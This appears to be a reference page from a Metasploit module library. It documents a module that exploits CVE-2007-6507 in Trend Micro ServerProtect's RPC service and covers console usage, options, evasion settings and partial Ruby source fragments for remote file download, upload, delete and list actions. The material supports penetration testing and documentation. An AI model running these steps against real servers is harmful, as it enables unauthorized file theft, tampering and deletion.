TrendMicro ServerProtect File Access - Metasploit


This page contains detailed information about how to use the auxiliary/admin/serverprotect/file metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: TrendMicro ServerProtect File Access
Module: auxiliary/admin/serverprotect/file
Source code: modules/auxiliary/admin/serverprotect/file.rb
Disclosure date: -
Last modification time: 2020-05-12 22:15:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 5168
List of CVEs: CVE-2007-6507

This modules exploits a remote file access flaw in the ServerProtect Windows Server RPC service. Please see the action list (or the help output) for more information.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

msf > use auxiliary/admin/serverprotect/file
msf auxiliary(file) > show targets
    ... a list of targets ...
msf auxiliary(file) > set TARGET target-id
msf auxiliary(file) > show options
    ... show and set options ...
msf auxiliary(file) > exploit

Required Options

  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage

Here is how the admin/serverprotect/file auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/serverprotect/file

msf6 auxiliary(admin/serverprotect/file) > show info

       Name: TrendMicro ServerProtect File Access
     Module: auxiliary/admin/serverprotect/file
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  toto

Available actions:
  Name      Description
  ----      -----------
  delete    Delete a file
  download  Download a file
  list      List files (not recommended - will crash the driver)
  upload    Upload a file

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  LPATH                    no        The local filesystem path
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPATH                    no        The remote filesystem path
  RPORT   5168             yes       The target port (TCP)

Description:
  This modules exploits a remote file access flaw in the ServerProtect 
  Windows Server RPC service. Please see the action list (or the help 
  output) for more information.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2007-6507
  OSVDB (44318)
  http://www.zerodayinitiative.com/advisories/ZDI-07-077

Module Options

This is a complete list of options available in the admin/serverprotect/file auxiliary module:

msf6 auxiliary(admin/serverprotect/file) > show options

Module options (auxiliary/admin/serverprotect/file):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   LPATH                    no        The local filesystem path
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPATH                    no        The remote filesystem path
   RPORT   5168             yes       The target port (TCP)

Advanced Options

Here is a complete list of advanced options supported by the admin/serverprotect/file auxiliary module:

msf6 auxiliary(admin/serverprotect/file) > show advanced

Module advanced options (auxiliary/admin/serverprotect/file):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   CHOST                                 no        The local client address
   CPORT                                 no        The local client port
   ConnectTimeout       10               yes       Maximum number of seconds to establish a TCP connection
   DCERPC::ReadTimeout  300              yes       The number of seconds to wait for DCERPC responses
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                  false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                             no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode        PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion           Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE              false            no        Enable detailed status messages
   WORKSPACE                             no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the admin/serverprotect/file module can do:

msf6 auxiliary(admin/serverprotect/file) > show actions

Auxiliary actions:

   Name      Description
   ----      -----------
   delete    Delete a file
   download  Download a file
   list      List files (not recommended - will crash the driver)
   upload    Upload a file

Evasion Options

Here is the full list of possible evasion options supported by the admin/serverprotect/file auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/serverprotect/file) > show evasion

Module evasion options:

   Name                             Current Setting  Required  Description
   ----                             ---------------  --------  -----------
   DCERPC::fake_bind_multi          true             no        Use multi-context bind calls
   DCERPC::fake_bind_multi_append   0                no        Set the number of UUIDs to append the target
   DCERPC::fake_bind_multi_prepend  0                no        Set the number of UUIDs to prepend before the target
   DCERPC::max_frag_size            4096             yes       Set the DCERPC packet fragmentation size
   DCERPC::smb_pipeio               rw               no        Use a different delivery method for accessing named pipes (Accepted: rw, trans)
   TCP::max_send_size               0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay                  0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

The <NAME> parameter is required by this option

Here is a relevant code snippet related to the "The <NAME> parameter is required by this option" error message:

54:	      ])
55:	  end
56:	
57:	  def check_option(name)
58:	    if(not datastore[name])
59:	      raise RuntimeError, "The #{name} parameter is required by this option"
60:	    end
61:	  end
62:	
63:	  def auxiliary_commands
64:	    {

Unknown action <ACTION.NAME>

Here is a relevant code snippet related to the "Unknown action <ACTION.NAME>" error message:

84:	      cmd_delete(datastore['RPATH'])
85:	    when 'list'
86:	      check_option('RPATH')
87:	      cmd_list(datastore['RPATH'])
88:	    else
89:	      print_error("Unknown action #{action.name}")
90:	    end
91:	  end
92:	
93:	  def deunicode(str)
94:	    str.gsub(/\x00/, '').strip

An unknown error occurred while calling FindFirstFile.

Here is a relevant code snippet related to the "An unknown error occurred while calling FindFirstFile." error message:

112:	    # FindFirstFile
113:	    resp = serverprotect_rpccmd(131080, data, 0x100)
114:	    return if not resp
115:	
116:	    if resp.length != 0x108
117:	      print_error("An unknown error occurred while calling FindFirstFile.")
118:	      return
119:	    end
120:	
121:	
122:	    ret, = resp[0x104,4].unpack('V')

An error occurred while calling FindFirstFile <ARGS:0>: <RET>.

Here is a relevant code snippet related to the "An error occurred while calling FindFirstFile <ARGS:0>: <RET>." error message:

119:	    end
120:	
121:	
122:	    ret, = resp[0x104,4].unpack('V')
123:	    if ret != 0
124:	      print_error("An error occurred while calling FindFirstFile #{args[0]}: #{ret}.")
125:	      return
126:	    end
127:	
128:	    handle, = resp[4,4].unpack('V')
129:

An unknown error occurred while calling FindFirstFile.

Here is a relevant code snippet related to the "An unknown error occurred while calling FindFirstFile." error message:

137:	      # FindNextFile
138:	      resp = serverprotect_rpccmd(131081, data, 0x100)
139:	      return if not resp
140:	
141:	      if resp.length != 0x108
142:	        print_error("An unknown error occurred while calling FindFirstFile.")
143:	        break
144:	      end
145:	
146:	      ret, = resp[0x104,4].unpack('V')
147:	      if ret != 0

An error occurred while deleting <ARGS:0>: <RET>.

Here is a relevant code snippet related to the "An error occurred while deleting <ARGS:0>: <RET>." error message:

174:	      ret, = resp[8,4].unpack('V')
175:	
176:	      if ret == 0
177:	        print_good("File #{args[0]} successfully deleted.")
178:	      else
179:	        print_error("An error occurred while deleting #{args[0]}: #{ret}.")
180:	      end
181:	    end
182:	
183:	  end
184:

An unknown error occurred while calling CreateFile.

Here is a relevant code snippet related to the "An unknown error occurred while calling CreateFile." error message:

257:	
258:	    resp = serverprotect_rpccmd(131073, data, 540)
259:	    return if not resp
260:	
261:	    if (resp.length < 548)
262:	      print_error("An unknown error occurred while calling CreateFile.")
263:	      return 0
264:	    else
265:	      handle, = resp[4,4].unpack('V')
266:	      ret, = resp[544,4].unpack('V')
267:

An error occurred while calling CreateFile: <RET>.

Here is a relevant code snippet related to the "An error occurred while calling CreateFile: <RET>." error message:

264:	    else
265:	      handle, = resp[4,4].unpack('V')
266:	      ret, = resp[544,4].unpack('V')
267:	
268:	      if ret != 0
269:	        print_error("An error occurred while calling CreateFile: #{ret}.")
270:	        return 0
271:	      else
272:	        return handle
273:	      end
274:	    end

An unknown error occurred while calling ReadFile.

Here is a relevant code snippet related to the "An unknown error occurred while calling ReadFile." error message:

281:	
282:	    resp = serverprotect_rpccmd(131075, data, 4104)
283:	    return if not resp
284:	
285:	    if (resp.length != 4112)
286:	      print_error("An unknown error occurred while calling ReadFile.")
287:	      return ''
288:	    else
289:	      ret, = resp[4108,4].unpack('V')
290:	
291:	      if ret != 0

An error occurred while calling CreateFile: <RET>.

Here is a relevant code snippet related to the "An error occurred while calling CreateFile: <RET>." error message:

287:	      return ''
288:	    else
289:	      ret, = resp[4108,4].unpack('V')
290:	
291:	      if ret != 0
292:	        print_error("An error occurred while calling CreateFile: #{ret}.")
293:	        return ''
294:	      else
295:	        br, = resp[4104, 4].unpack('V')
296:	        return resp[8, br]
297:	      end

An unknown error occurred while calling WriteFile.

Here is a relevant code snippet related to the "An unknown error occurred while calling WriteFile." error message:

307:	
308:	    resp = serverprotect_rpccmd(131076, data, 4104)
309:	    return if not resp
310:	
311:	    if (resp.length != 4112)
312:	      print_error("An unknown error occurred while calling WriteFile.")
313:	      return 0
314:	    else
315:	      ret, = resp[4108,4].unpack('V')
316:	
317:	      if ret != 0

An error occurred while calling WriteFile: <RET>.

Here is a relevant code snippet related to the "An error occurred while calling WriteFile: <RET>." error message:

313:	      return 0
314:	    else
315:	      ret, = resp[4108,4].unpack('V')
316:	
317:	      if ret != 0
318:	        print_error("An error occurred while calling WriteFile: #{ret}.")
319:	        return 0
320:	      end
321:	    end
322:	
323:	    return 1

An unknown error occurred while calling CloseHandle.

Here is a relevant code snippet related to the "An unknown error occurred while calling CloseHandle." error message:

329:	
330:	    resp = serverprotect_rpccmd(131074, data, 4)
331:	    return if not resp
332:	
333:	    if (resp.length != 12)
334:	      print_error("An unknown error occurred while calling CloseHandle.")
335:	    else
336:	      ret, = resp[8,4].unpack('V')
337:	
338:	      if ret != 0
339:	        print_error("An error occurred while calling CloseHandle: #{ret}.")

An error occurred while calling CloseHandle: <RET>.

Here is a relevant code snippet related to the "An error occurred while calling CloseHandle: <RET>." error message:

334:	      print_error("An unknown error occurred while calling CloseHandle.")
335:	    else
336:	      ret, = resp[8,4].unpack('V')
337:	
338:	      if ret != 0
339:	        print_error("An error occurred while calling CloseHandle: #{ret}.")
340:	      end
341:	    end
342:	  end
343:	
344:

Error: <E>

Here is a relevant code snippet related to the "Error: <E>" error message:

387:	
388:	      outp
389:	
390:	    rescue ::Interrupt
391:	      raise $!
392:	    rescue ::Exception => e
393:	      print_error("Error: #{e}")
394:	      nil
395:	    end
396:	  end
397:	end

Go back to menu.

References

See Also

Check also the following modules related to this module:

Related Nessus plugins:

Authors

  • toto

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.